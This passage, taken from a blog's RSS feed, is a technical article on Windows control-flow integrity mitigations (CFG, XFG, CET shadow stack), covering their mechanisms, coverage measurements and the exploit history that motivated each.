</content:encoded><category>authenticode</category><category>wdac</category><category>code-signing</category><category>pkcs7</category><category>windows-security</category><category>catalog-files</category><category>kmcs</category><category>rfc-3161</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Control Flow Integrity on Windows: CFG, XFG, and the CET Shadow Stack</title><link>https://paragmali.com/blog/control-flow-integrity-on-windows-cfg-xfg-and-the-cet-shadow/</link><guid isPermaLink="true">https://paragmali.com/blog/control-flow-integrity-on-windows-cfg-xfg-and-the-cet-shadow/</guid><description>Three generations of control-flow integrity on Windows: the CFG bitmap (2014), the XFG prototype-hash (never fully shipped), and the Intel CET shadow stack (2020). Why each shipped, and what the ~70% memory-safety statistic still leaves open.</description><pubDate>Tue, 12 May 2026 00:00:00 GMT</pubDate><content:encoded>
Windows ships three generations of control-flow integrity in 2026. **CFG** (Control Flow Guard, 2014) is a per-process bitmap of valid indirect-call targets, one or two bits per 16 bytes of address space. **XFG** (eXtended Flow Guard, announced 2019) refines CFG with a 64-bit per-prototype hash stored eight bytes before each function entry, but was never fully instrumented in shipping Windows and is now deprecated. **Intel CET** (Tiger Lake silicon, September 2, 2020) adds a CPU-managed shadow stack and an `ENDBR64`-based indirect branch tracker; Windows uses only the shadow-stack half. User-mode shadow stack is default-on for `/CETCOMPAT`-marked binaries on CET-capable hardware. Kernel-mode shadow stack is **off** by default on Windows 11 24H2 and Windows Server 2025, requires Virtualization-Based Security plus Hypervisor-enforced Code Integrity, and must be enabled explicitly. None of these mitigations close the data-only attack class identified by Hu and colleagues in 2016, and roughly 70% of CVEs Microsoft issued between 2006 and 2018 were memory-safety bugs the entire CFI stack cannot prevent.
&lt;h2&gt;1. One Status Code, Two Processes&lt;/h2&gt;
&lt;p&gt;Open PowerShell on a Windows 11 24H2 machine and run &lt;code&gt;Get-ProcessMitigation -Name notepad.exe&lt;/code&gt;. Run it again with &lt;code&gt;-Name msedge.exe&lt;/code&gt;. Three rows will be different: &lt;code&gt;CFG.Enable&lt;/code&gt;, &lt;code&gt;UserShadowStack.Enable&lt;/code&gt;, and &lt;code&gt;UserShadowStack.StrictMode&lt;/code&gt;. The same operating system, on the same hardware, is applying three different control-flow integrity contracts to two different processes. This article is the answer to &lt;em&gt;why&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;To make the question concrete, here is the failure mode each contract is trying to prevent. Crash a process with a deliberately corrupted indirect-call target and Windows reports &lt;code&gt;STATUS_STACK_BUFFER_OVERRUN&lt;/code&gt; (0xC0000409). Dig into the fast-fail subcode and you find &lt;code&gt;FAST_FAIL_GUARD_ICALL_CHECK_FAILURE&lt;/code&gt;, value &lt;code&gt;0x0A&lt;/code&gt; in &lt;code&gt;winnt.h&lt;/code&gt;. That is the canonical CFG fast-fail.&lt;/p&gt;
&lt;p&gt;Trip a corrupted return address while user-mode Hardware-enforced Stack Protection is active and the same status code fires with a CET-specific subcode, this time raised by the CPU&apos;s &lt;code&gt;#CP&lt;/code&gt; (Control Protection) exception rather than by a compiler-inserted check thunk [@ms-hsp-techcommunity].&lt;code&gt;FAST_FAIL_GUARD_ICALL_CHECK_FAILURE&lt;/code&gt; is defined in the Windows SDK &lt;code&gt;winnt.h&lt;/code&gt; header with value &lt;code&gt;0x0A&lt;/code&gt;. The Microsoft Learn CFG primary documents the runtime check-thunk path that routes the fault [@ms-learn-cfg].&lt;/p&gt;
&lt;p&gt;{`
// Emulates Get-ProcessMitigation -Name notepad.exe vs msedge.exe
// In real PowerShell this calls GetProcessMitigationPolicy() under the hood.&lt;/p&gt;
&lt;p&gt;const policies = {
  &apos;notepad.exe&apos;: {
    CFG:  { Enable: &apos;ON&apos;,  StrictMode: &apos;OFF&apos; },
    USS:  { Enable: &apos;OFF&apos;, StrictMode: &apos;OFF&apos;, AuditEnable: &apos;OFF&apos; }
  },
  &apos;msedge.exe&apos;: {
    CFG:  { Enable: &apos;ON&apos;,  StrictMode: &apos;ON&apos; },
    USS:  { Enable: &apos;ON&apos;,  StrictMode: &apos;ON&apos;,  AuditEnable: &apos;OFF&apos; }
  }
};&lt;/p&gt;
&lt;p&gt;for (const [proc, p] of Object.entries(policies)) {
  console.log(proc);
  console.log(&apos;  CFG.Enable                  :&apos;, p.CFG.Enable);
  console.log(&apos;  UserShadowStack.Enable      :&apos;, p.USS.Enable);
  console.log(&apos;  UserShadowStack.StrictMode  :&apos;, p.USS.StrictMode);
}
`}&lt;/p&gt;
&lt;p&gt;The three rows that differ are the three generations of Windows CFI. CFG arrived first, in November 2014 on Windows 8.1 Update 3. Five years later, in 2019, Microsoft announced its prototype-hash refinement called eXtended Flow Guard. Five years after that, in 2024, an academic measurement and a Black Hat retrospective confirmed XFG was never fully shipped. In between, in September 2020, Intel taped out the first commercial silicon with a hardware shadow stack, and Microsoft routed &lt;code&gt;#CP&lt;/code&gt; faults from that silicon into the same &lt;code&gt;STATUS_STACK_BUFFER_OVERRUN&lt;/code&gt; channel. Each generation closes a different attack class. The status code is the lens.&lt;/p&gt;
&lt;p&gt;To understand why three generations exist, we have to start where the attacker did: in 1996, with a stack and a buffer.&lt;/p&gt;

timeline
    title Three generations of Windows control-flow integrity
    1996 : Aleph One Phrack 49-14 : Stack smashing tutorial
    1997 : Solar Designer BugTraq : Return-into-libc
    2004 : Windows XP SP2 ships DEP
    2005 : Abadi et al. name CFI
    2007 : Shacham CCS 2007 : ROP
    2011 : Bletsch et al. ASIACCS 2011 : JOP
    2014 : Windows 8.1 Update 3 ships CFG
    2015 : Schuster et al. IEEE S&amp;amp;P 2015 : COOP
    2016 : Hu et al. IEEE S&amp;amp;P 2016 : DOP
    2016 : Intel publishes CET spec
    2019 : Weston announces XFG at BlueHat Shanghai
    2020 : Tiger Lake ships CET silicon : AMD Zen 3 ships compatible shadow stack
    2024 : WOOT 2024 measures Windows CFI coverage
    2025 : McGarr BHUSA : XFG never fully instrumented
&lt;h2&gt;2. The Attack That Started Everything&lt;/h2&gt;
&lt;p&gt;Aleph One, the pseudonym of Elias Levy (BugTraq moderator and later CTO of SecurityFocus), sat down in November 1996 and wrote Phrack Magazine Volume 7, Issue 49, File 14 of 16: &lt;em&gt;Smashing The Stack For Fun And Profit&lt;/em&gt; [@aleph1-1996-phrack]. The tutorial is meticulous. Levy walks the reader from C&apos;s stack-frame layout through &lt;code&gt;gets()&lt;/code&gt; and &lt;code&gt;strcpy()&lt;/code&gt; to a working shellcode payload that overflows a fixed-size automatic buffer, overwrites the saved return address, and redirects &lt;code&gt;ret&lt;/code&gt; to attacker-supplied instructions in the same buffer.&lt;/p&gt;
&lt;p&gt;It is the first widely-distributed step-by-step exposition of stack-buffer-overflow exploitation. Every Windows control-flow-integrity story has to recap it, because every later defense is a reaction to the bug class it demonstrated.&quot;Aleph One&quot; is the pen name of Elias Levy, BugTraq mailing-list moderator from 1996 to 2001 and later CTO of SecurityFocus. The pseudonym refers to the first transfinite cardinal in Cantor set theory [@wiki-elias-levy].&lt;/p&gt;
&lt;p&gt;The natural question the 1996 article raises is the one every defender after Levy had to answer. If overflowing a stack buffer can rewrite the return address, what stops the attacker from making &lt;code&gt;ret&lt;/code&gt; point anywhere they want?&lt;/p&gt;
&lt;p&gt;For a decade the answer was &quot;almost nothing.&quot; Researchers prototyped stack-canary schemes (StackGuard, then &lt;code&gt;/GS&lt;/code&gt; in Visual C++ 2002) and proposed compiler-rewriting defenses, but the fundamental shift waited for hardware [@ms-learn-gs].&lt;/p&gt;
&lt;p&gt;On September 23, 2003, AMD shipped the Athlon 64 with the NX bit -- bit 63 of the AMD64 page-table entry, marketed under the label &quot;Enhanced Virus Protection.&quot; Intel followed with the XD bit on Prescott-based Pentium 4 in 2004 [@wiki-nx-bit]. With per-page no-execute enforcement in silicon, an operating system could finally mark data pages as non-executable and refuse to dispatch a &lt;code&gt;jmp&lt;/code&gt; into the stack. Windows XP Service Pack 2, on August 6, 2004, was the first mainstream OS to enable hardware-enforced Data Execution Prevention by default for system binaries on NX-capable CPUs [@wiki-xp-sp2].&lt;/p&gt;
&lt;p&gt;DEP did exactly what it advertised. It also broke the attacker&apos;s model. If data pages cannot execute, no amount of clever shellcode injection helps -- the bytes in the buffer simply will not run. The next move belongs to Solar Designer.&lt;/p&gt;
&lt;p&gt;On August 10, 1997 -- seven years before DEP shipped -- Alexander Peslyak, posting as Solar Designer on the BugTraq mailing list, published the first public exploit demonstrating &lt;em&gt;code reuse&lt;/em&gt;: overflow the buffer, redirect &lt;code&gt;ret&lt;/code&gt; not to attacker-supplied shellcode but to the entry of an existing libc function such as &lt;code&gt;system()&lt;/code&gt;, and hand-craft the stack so the function&apos;s arguments come from attacker-controlled data [@solar-1997-bugtraq]. Solar Designer was prescient. In the same post he observed that this method &quot;might sometimes be better than usual one (with shellcode) even if the stack is executable.&quot;&lt;/p&gt;
&lt;p&gt;If the data pages cannot execute, reuse the code already there. That single sentence is the structural premise of every code-reuse attack from that day forward.&lt;/p&gt;

A static safety property defined by Abadi, Budiu, Erlingsson and Ligatti in 2005: every indirect control-flow transfer at runtime must follow an edge in a precomputed static control-flow graph of the program. CFI as a contract makes no claim about *data* integrity -- only about the targets of `call`, `jmp` through a register, and `ret`. Modern Windows mitigations (CFG, XFG, CET) each implement part of this contract.
&lt;p&gt;By the mid-2000s the structural answer was overdue. In November 2005, at the 12th ACM Conference on Computer and Communications Security, Martin Abadi, Mihai Budiu and Ulfar Erlingsson (all at Microsoft Research Silicon Valley) together with Jay Ligatti named the contract: &lt;em&gt;Control-Flow Integrity&lt;/em&gt; [@abadi-2005-mr]. Their paper&apos;s abstract states the thesis plainly: &quot;enforcement of a basic safety property, Control-Flow Integrity (CFI), can prevent such attacks from arbitrarily controlling program behavior.&quot;&lt;/p&gt;
&lt;p&gt;Every indirect control-flow transfer at runtime must follow an edge in a precomputed static control-flow graph. The paper demonstrated a prototype binary rewriter that placed a unique ID-check label before every indirect-call target and inserted a label-comparison stub before every indirect call and return, refusing to dispatch unless the labels matched. Benchmarks reported 16% average overhead -- impractical for production, but the contract was now formal.&lt;/p&gt;
&lt;p&gt;The contract was the easy part. Implementing it took Microsoft another nine years. In the interim, attackers built three generations of code reuse: ROP, JOP and COOP. We have to understand all three before we can read CFG&apos;s source listing.&lt;/p&gt;
&lt;h2&gt;3. The Mitigation Stack Before CFI&lt;/h2&gt;
&lt;p&gt;Between Aleph One&apos;s 1996 tutorial and the first Windows CFI shipment in 2014 lies an eighteen-year sequence of defenses that closed every direct attack path one by one. None of them protected indirect transfers. Together they make injecting attacker-controlled instructions uneconomic and force the attacker into code reuse. The attacker&apos;s choice in 2007 is no longer &quot;inject&quot; -- it is &quot;reuse.&quot;&lt;/p&gt;
&lt;p&gt;The pieces matter because each is referenced by name in the CFG documentation. Visual C++ 2002 introduced &lt;code&gt;/GS&lt;/code&gt;, which inserts a random cookie between local buffers and the saved return address and validates it on function epilogue [@ms-learn-gs]. A contiguous overflow that overwrites the return address must also pass through the cookie, and the runtime check terminates the process before &lt;code&gt;ret&lt;/code&gt; dispatches. Stack-cookie schemes do not stop the attacker who has a non-contiguous write primitive, but they raise the cost of the canonical exploit Aleph One described.&lt;/p&gt;
&lt;p&gt;Vista RTM was build 6000, shipped November 8, 2006 [@wiki-vista]. ASLR was opt-in via &lt;code&gt;/DYNAMICBASE&lt;/code&gt; and required PE images to be re-linked; pre-Vista binaries continued to load at fixed bases until the developer recompiled.&lt;/p&gt;
&lt;p&gt;DEP, again on Windows XP SP2 in August 2004, paired the NX bit with a per-process OptIn / OptOut / AlwaysOn / AlwaysOff policy surface. ASLR followed two years later in Windows Vista RTM build 6000 on November 8, 2006: image-base, heap, stack and PEB/TEB locations randomised per boot or process, with binaries opting in via the &lt;code&gt;/DYNAMICBASE&lt;/code&gt; linker flag [@ms-learn-aslr-vista]. The PaX project on Linux had pioneered the technique in July 2001, OpenBSD 3.4 shipped ASLR by default in 2003, and Linux mainline followed in 2005; Vista was the third major OS in the column [@wiki-aslr].&lt;/p&gt;
&lt;p&gt;SafeSEH (a linker-side table of legal exception handlers, validated at SEH dispatch) and its runtime sibling SEHOP closed the SEH-overwrite technique David Litchfield formalised in his September 2003 NGSSoftware paper [@ms-learn-safeseh]. That class became canonical in the 2004-2008 browser and Office client-side exploit lineage, distinct from the return-address-overwrite worms (Code Red 2001 against IIS, Slammer 2003 against SQL Server 2000, Blaster 2003 and Sasser 2004 against RPC and LSASS) that motivated DEP and &lt;code&gt;/GS&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;By late 2007, every direct attack was closed. Stack canaries caught contiguous overflows on epilogue. DEP refused to dispatch into data pages. ASLR forced the attacker to leak a pointer before any hardcoded address would resolve. SafeSEH constrained the SEH chain.&lt;/p&gt;
&lt;p&gt;The structural gap each left was the same: &lt;em&gt;indirect calls and indirect jumps remained unconstrained&lt;/em&gt;. An attacker who could write a corrupted function pointer through any means -- type-confusion, use-after-free, integer-overflow-feeding-allocator -- could still redirect an indirect call to any legitimately-executable byte in the process. Hovav Shacham turned the question inside out. Instead of inventing new instructions, he used the ones already there.&lt;/p&gt;
&lt;h2&gt;4. Three Generations of CFI on Windows&lt;/h2&gt;
&lt;h3&gt;4.1 Generation 1: Control Flow Guard&lt;/h3&gt;
&lt;p&gt;Shacham steps up to a CCS 2007 podium in Alexandria, Virginia, and demonstrates a Turing-complete instruction set discovered &lt;em&gt;inside&lt;/em&gt; an unmodified libc binary -- &lt;code&gt;ret&lt;/code&gt;-terminated gadgets at byte offsets the binary&apos;s author never intended [@shacham-2007-rop]. The audience now has a name for what is coming: &lt;em&gt;return-oriented programming&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;The paper, &quot;The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86),&quot; constructs a complete shellcode -- load, store, arithmetic, logic, control flow, system calls -- entirely from these gadgets, without injecting a single byte of executable code. The CCS 2017 Test-of-Time Award acknowledges the paper&apos;s formative impact a decade later [@ccs-2017-awards]. Wikipedia summarises the canonical arc concisely: &quot;With data execution prevention, an adversary cannot directly execute instructions written to a buffer ... To defeat this protection, a return-oriented programming attack does not inject malicious instructions, but rather uses instruction sequences already present in executable memory, called &apos;gadgets&apos;, by manipulating return addresses&quot; [@wiki-rop].&lt;/p&gt;

A short, attacker-useful instruction sequence ending in a control-flow transfer (typically `ret` for ROP, an indirect `jmp` for JOP, or an indirect `call` through a vtable for COOP). The defining property of a gadget is that it exists *unintentionally* inside a legitimate executable image, at a byte offset the binary&apos;s author never planned for the CPU to start decoding. Variable-length x86 instructions make gadgets plentiful: any random `0xC3` byte in the middle of a function is a potential `ret`-terminated tail.

The forward edge of a control-flow graph is any indirect transfer whose target is determined at runtime: indirect `call`, indirect `jmp`, virtual dispatch through a vtable, function-pointer call. The backward edge is the `ret` instruction returning to a caller. CFI implementations frequently address only one edge: CFG and XFG check forward edges with a bitmap or a hash; the Intel CET shadow stack checks the backward edge by comparing the popped return address against a CPU-managed parallel copy [@wiki-cfi].
&lt;p&gt;If gadgets are everywhere, how do you stop the attacker from calling them? Microsoft&apos;s answer arrived seven years later. On November 18, 2014, Windows 8.1 Update 3 (KB3000850) shipped Control Flow Guard [@ms-learn-cfg]. CFG is a &lt;em&gt;coarse-grained&lt;/em&gt; forward-edge CFI scheme. The contract is a single equivalence class per process: every address-taken function in any module loaded into the process is a legal indirect-call target; every other byte is not.&lt;/p&gt;
&lt;p&gt;The mechanism has four moving parts. First, the MSVC compiler invoked with &lt;code&gt;/guard:cf&lt;/code&gt; enumerates every function whose address is taken anywhere in the module and emits a check thunk -- &lt;code&gt;__guard_check_icall_fptr&lt;/code&gt; for &quot;check then return to caller,&quot; &lt;code&gt;__guard_dispatch_icall_fptr&lt;/code&gt; for &quot;check then tail-call dispatch&quot; -- at every indirect call site [@ms-learn-guard-flag]. Second, the linker emits a per-binary Function ID (FID) table inside &lt;code&gt;IMAGE_LOAD_CONFIG_DIRECTORY&lt;/code&gt; in the PE file, listing the relative virtual addresses of every legal target.&lt;/p&gt;
&lt;p&gt;Third, at image load time the Windows loader merges per-module FID tables into a process-wide bitmap (two bits per 16 bytes of code) backed by a kernel-managed, read-only mapping. Fourth, the check thunk indexes the bitmap by the target address; if the bit is clear, the thunk invokes &lt;code&gt;__fastfail(FAST_FAIL_GUARD_ICALL_CHECK_FAILURE)&lt;/code&gt;, which raises &lt;code&gt;STATUS_STACK_BUFFER_OVERRUN&lt;/code&gt; and terminates the process.&lt;/p&gt;

A PE-file structure inside `IMAGE_LOAD_CONFIG_DIRECTORY` that enumerates the relative virtual addresses of every address-taken function in the binary. The Windows loader&apos;s `LdrpProtectAndRelocateImage` routine merges every loaded module&apos;s FID table into a single process-wide bitmap. `dumpbin /loadconfig` displays the table&apos;s contents and the `CF Instrumented` and `FID table present` flags.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &lt;code&gt;/guard:cf&lt;/code&gt; alone is a silent no-op. The Microsoft Learn primary states the contract bluntly: &quot;The &lt;code&gt;/DYNAMICBASE&lt;/code&gt; linker option is also required&quot; [@ms-learn-guard-flag]. Without &lt;code&gt;/DYNAMICBASE&lt;/code&gt;, the linker omits the FID table entirely; the binary loads, no error fires, and the resulting image is not CFG-protected. Every CFG-aware build of a Windows binary must pass both flags.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The bitmap layout is worth a moment. McGarr&apos;s Black Hat USA 2025 &lt;em&gt;Out of Control&lt;/em&gt; deck documents the state machine in detail [@mcgarr-bhusa25-deck-primary]. Two bits per 16 bytes of address space encode four states: &lt;code&gt;(0,0)&lt;/code&gt; means no valid target; &lt;code&gt;(1,0)&lt;/code&gt; means a 16-byte-aligned valid target; &lt;code&gt;(1,1)&lt;/code&gt; means a non-aligned valid target (function entry is not 16-byte aligned); and &lt;code&gt;(0,1)&lt;/code&gt; is the suppressed-target marker the loader sets for entries the linker has decided are unsafe.&lt;/p&gt;
&lt;p&gt;The arithmetic of the bitmap is what reshaped the Windows 8.1 address space.Alex Ionescu walked through the arithmetic in his 2014 writeup: a 128 TB user-mode virtual address space at 16-byte granularity is 8 TB of possible targets, and at 2 bits per slot that is a 2 TB bitmap. The memory manager paginates the bitmap sparsely, so resident commit is tiny, but the &lt;em&gt;reservation&lt;/em&gt; could not coexist with the older 8 TB user-VA layout. CFG is the reason Windows 8.1 went from 8 TB to 128 TB user VA [@alex-ionescu-cfg].&lt;/p&gt;

Before Windows 8.1 Update 3, the Windows user-mode virtual address space on x64 was 8 TB per process. CFG&apos;s bitmap reservation is sized to cover the entire user-mode address space at 16-byte granularity -- one byte of bitmap per 64 bytes of VA. On the new 128 TB layout that is a 2 TB bitmap; had Microsoft instead sized the bitmap for the legacy 8 TB layout it would have been only 128 GB, but they did not. Alex Ionescu walked through the consequence after the November 2014 ship: dropping the 2 TB bitmap sized for the new 128 TB layout into the legacy 8 TB user VA would have cut the usable address space by 25% per process (2 TB / 8 TB) and pushed per-process commit to roughly 4 GB. So the engineering decision Microsoft made was to grow the user VA to 128 TB on the way to landing CFG. The 2 TB bitmap is the largest single contiguous reservation any Windows process has ever made, and most of its bytes are never touched [@alex-ionescu-cfg].
&lt;p&gt;The first independent reverse-engineering writeup came from Trend Micro in 2015: Jack Tang&apos;s &lt;em&gt;Exploring Control Flow Guard in Windows 10&lt;/em&gt; walks the &lt;code&gt;ntdll.dll!LdrpCallInitRoutine&lt;/code&gt; path, the per-module &lt;code&gt;__guard_check_icall_fptr&lt;/code&gt; import resolution, the &lt;code&gt;MEMORY_BASIC_INFORMATION.Protect &amp;amp; PAGE_TARGETS_INVALID&lt;/code&gt; flag, and the exact bitmap layout in full disassembly [@trend-micro-cfg]. The shape of the field is now a matter of public record.&lt;/p&gt;

flowchart LR
    A[MSVC compiler with /guard:cf] --&amp;gt;|emit check thunks| B[Object files with FID metadata]
    B --&amp;gt; C[Linker with /DYNAMICBASE]
    C --&amp;gt;|writes| D[FID table in IMAGE_LOAD_CONFIG_DIRECTORY]
    D --&amp;gt; E[PE binary on disk]
    E --&amp;gt; F[Windows loader at image load]
    F --&amp;gt;|LdrpProtectAndRelocateImage| G[Process-wide CFG bitmap]
    G --&amp;gt; H[__guard_check_icall_fptr at every indirect call]
    H --&amp;gt;|bit clear| I[STATUS_STACK_BUFFER_OVERRUN]
    H --&amp;gt;|bit set| J[Dispatch indirect call]
&lt;p&gt;The two-bit-per-16-byte state machine deserves a table.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Two-bit value&lt;/th&gt;
&lt;th&gt;Meaning&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;&lt;code&gt;(0, 0)&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Address is not a legal indirect-call target. Check thunk fast-fails.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;(1, 0)&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Address is a legal target &lt;em&gt;and&lt;/em&gt; is 16-byte aligned.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;(1, 1)&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Address is a legal target but is &lt;em&gt;not&lt;/em&gt; 16-byte aligned (function entry is misaligned).&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;(0, 1)&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Suppressed target: the linker marked the entry as deliberately invalid.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The Becker, Hollick and Classen &lt;em&gt;SoK&lt;/em&gt; paper at USENIX WOOT 2024 measured CFG coverage on a Windows 11 Insider Preview developer build 23440 at 97.37% of x64 PE files (only 2.63% unprotected), and 99.09% on &lt;code&gt;C:\Windows\System32&lt;/code&gt; (0.91% unprotected) [@woot24-becker-pdf]. The mitigation has reached near-universal coverage on the system surface; the gap is in third-party code that has not opted in.&lt;/p&gt;
&lt;p&gt;CFG worked, and it broke, in precisely the way 2007-era CFI papers had predicted. The first major bypass came from the JIT side. On October 11, 2016, Microsoft Patch Tuesday MS16-119 shipped a cumulative update to Microsoft Edge. Theori&apos;s Frontier Squad followed with a December 13, 2016 writeup describing the bypass it closed [@theori-chakra-jit].&lt;/p&gt;
&lt;p&gt;The Chakra JavaScript engine generated native code into a temporary writable buffer, then copied it to executable memory. While the code was in the temporary buffer, an adversary with a write primitive could rewrite the bytes the JIT was about to emit, smuggling attacker-chosen instructions into legitimately CFG-valid territory. JIT-emitted code is, by construction, registered as a valid CFG target through &lt;code&gt;SetProcessValidCallTargets&lt;/code&gt; [@ms-learn-setprocessvalidcalltargets] -- there is no way to ship a working JavaScript runtime otherwise. CFG cannot tell intended JIT output from substituted JIT output.&lt;/p&gt;

CFG didn&apos;t offer any granularity over the valid call targets. Any protected indirect call was allowed to call any valid call target. In large binaries, valid call targets could easily be in the thousands, giving attackers plenty of flexibility to bypass CFG by chaining valid C++ virtual functions.
-- Quarkslab, *How the MSVC compiler generates XFG function prototype hashes*
&lt;p&gt;The deeper structural bypass arrived first, at IEEE Symposium on Security and Privacy 2015. Felix Schuster and his coauthors at Ruhr-University Bochum and TU Darmstadt published &lt;em&gt;Counterfeit Object-oriented Programming&lt;/em&gt; -- the COOP attack [@schuster-2015-coop]. Their observation was structural. C++ virtual calls dispatch through vtables. Every vtable entry points at a function whose address has been taken. Every such function is therefore a valid CFG target by construction.&lt;/p&gt;
&lt;p&gt;An attacker who can corrupt an object&apos;s vtable pointer can chain valid virtual calls and reach Turing-completeness without leaving the CFG-valid set. The CFG bitmap never fires. The check passes every time.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; CFG asks the same question of every indirect call: is this target&apos;s address bit set in the process-wide bitmap? Every C++ virtual method is address-taken. Every vtable entry is in the bitmap. Schuster&apos;s COOP attack stays inside the legal set and reaches Turing-completeness without CFG ever firing. To close COOP, the check has to ask a harder question: does this function&apos;s signature match the call site&apos;s?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;4.2 Generation 1.5: eXtended Flow Guard&lt;/h3&gt;
&lt;p&gt;Bletsch and colleagues at NC State and the National University of Singapore published &lt;em&gt;Jump-Oriented Programming: A New Class of Code-Reuse Attack&lt;/em&gt; at ASIACCS 2011 in Hong Kong [@bletsch-2011-jop]. JOP replaces ROP&apos;s &lt;code&gt;ret&lt;/code&gt;-terminated gadgets with &lt;em&gt;indirect-jump-terminated&lt;/em&gt; gadgets dispatched by a separate dispatcher gadget, typically an indirect &lt;code&gt;jmp&lt;/code&gt; that updates a virtual program counter held in a chosen register. The attack defeats any defense that single-targets &lt;code&gt;ret&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Schuster&apos;s COOP, four years later, defeated CFG itself. By 2019 the natural defensive answer was overdue, and David Weston walked on stage at BlueHat Shanghai 2019 to announce Microsoft&apos;s response: &lt;em&gt;eXtended Flow Guard&lt;/em&gt; [@dwizzle-presentations].&lt;/p&gt;

A code-reuse attack class identified by Schuster, Tendyck, Liebchen, Davi, Sadeghi and Holz in IEEE S&amp;amp;P 2015 [@schuster-2015-coop]. COOP chains C++ virtual calls dispatched through legitimately-existing vtables. Because every vtable entry is the address of a virtual method whose address has been taken, every dispatch target is a valid CFG bitmap entry by construction. COOP reaches Turing-completeness without ever violating coarse-grained forward-edge CFI. The attack is the structural reason XFG was designed.
&lt;p&gt;If COOP attacks survive CFG by staying inside the legal set, what makes a target&apos;s signature legal? XFG&apos;s answer is a 64-bit truncated SHA-1 hash of each function&apos;s prototype, computed at compile time and stored eight bytes before the function entry. The call site loads the expected hash into &lt;code&gt;r10&lt;/code&gt;. Dispatch goes through &lt;code&gt;__guard_dispatch_icall_fptr_xfg&lt;/code&gt;, which reads the eight bytes at &lt;code&gt;[rax - 8]&lt;/code&gt; and compares them to &lt;code&gt;r10&lt;/code&gt;. Mismatch raises &lt;code&gt;STATUS_STACK_BUFFER_OVERRUN&lt;/code&gt;. Quarkslab&apos;s 2020 teardown documents the dispatch in detail [@quarkslab-xfg].Quarkslab&apos;s reverse-engineering shows the XFG dispatch thunk also ORs bit 0 of &lt;code&gt;r10&lt;/code&gt; before the comparison, a feature that lets the loader downgrade XFG to plain CFG semantics for modules that did not opt into the hash check [@quarkslab-xfg].&lt;/p&gt;

sequenceDiagram
    participant CallSite as XFG-instrumented call site
    participant Thunk as __guard_dispatch_icall_fptr_xfg
    participant Target as Target function entry
    CallSite-&amp;gt;&amp;gt;CallSite: load expected hash into r10
    CallSite-&amp;gt;&amp;gt;Thunk: call thunk(rax = target)
    Thunk-&amp;gt;&amp;gt;Target: read 8 bytes at [rax - 8]
    Thunk-&amp;gt;&amp;gt;Thunk: compare with r10
    alt hashes match
        Thunk-&amp;gt;&amp;gt;Target: dispatch indirect call
    else mismatch
        Thunk-&amp;gt;&amp;gt;Thunk: STATUS_STACK_BUFFER_OVERRUN
    end
&lt;p&gt;The toolchain is narrower than CFG&apos;s. The &lt;code&gt;/guard:xfg&lt;/code&gt; flag shipped in Visual Studio 2019 Preview 16.5 [@mcgarr-examining-xfg]. Connor McGarr&apos;s 2020 &lt;em&gt;Examining XFG&lt;/em&gt; writeup is the canonical practitioner-side reference, documenting the thunk, the hash placement, and the build contract. Upstream LLVM and Clang shipped no equivalent.&lt;/p&gt;
&lt;p&gt;Critically, &lt;code&gt;/guard:xfg&lt;/code&gt; is &lt;em&gt;not documented&lt;/em&gt; on the Microsoft Learn &lt;code&gt;/guard&lt;/code&gt; page, which lists only &lt;code&gt;/guard:cf&lt;/code&gt; and &lt;code&gt;/guard:cf-&lt;/code&gt; [@ms-learn-guard-flag]. That documentation absence is a leading indicator.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The &lt;code&gt;/guard:xfg&lt;/code&gt; compiler flag is documented only on third-party reverse-engineering writeups, never on the canonical Microsoft Learn &lt;code&gt;/guard&lt;/code&gt; page [@ms-learn-guard-flag]. Upstream LLVM and Clang have no equivalent XFG-instrumentation pass. The closest Linux peer is Sami Tolvanen&apos;s kCFI work, which shipped a 32-bit prototype hash in Linux 6.1 (December 2022) [@lwn-kcfi].&lt;/p&gt;
&lt;/blockquote&gt;

The Microsoft Learn `/guard` flag page documents `/guard:cf` and the negative form `/guard:cf-` in full prose, including the `/DYNAMICBASE` requirement. It does not name `/guard:xfg`, and a search across Microsoft Learn turns up only product-blog entries and Visual Studio release notes, never canonical reference documentation for the flag&apos;s semantics. For a feature whose mechanics are public and whose tooling has shipped in MSVC since Visual Studio 2019 Preview 16.5, this is an unusual absence. The signal it sends to internal Microsoft developers and to ISV partners writing CFI-aware code is the same: XFG is not a product-graduated feature, and code should not rely on it. Quarkslab and McGarr have done the work Microsoft did not.
&lt;p&gt;The WOOT 2024 paper is the empirical measurement. Becker, Hollick and Classen analysed the Windows 11 Insider Preview developer build 23440 and reported the numbers verbatim in Table 4: 85.73% of executables carry XFG instrumentation, 85.70% of DLLs, 97.04% of &lt;code&gt;C:\Windows\System32&lt;/code&gt; DLLs, with a geometric-mean equivalence-class size of 1.37 [@woot24-becker-pdf] [@woot24-becker-abstract].&lt;/p&gt;
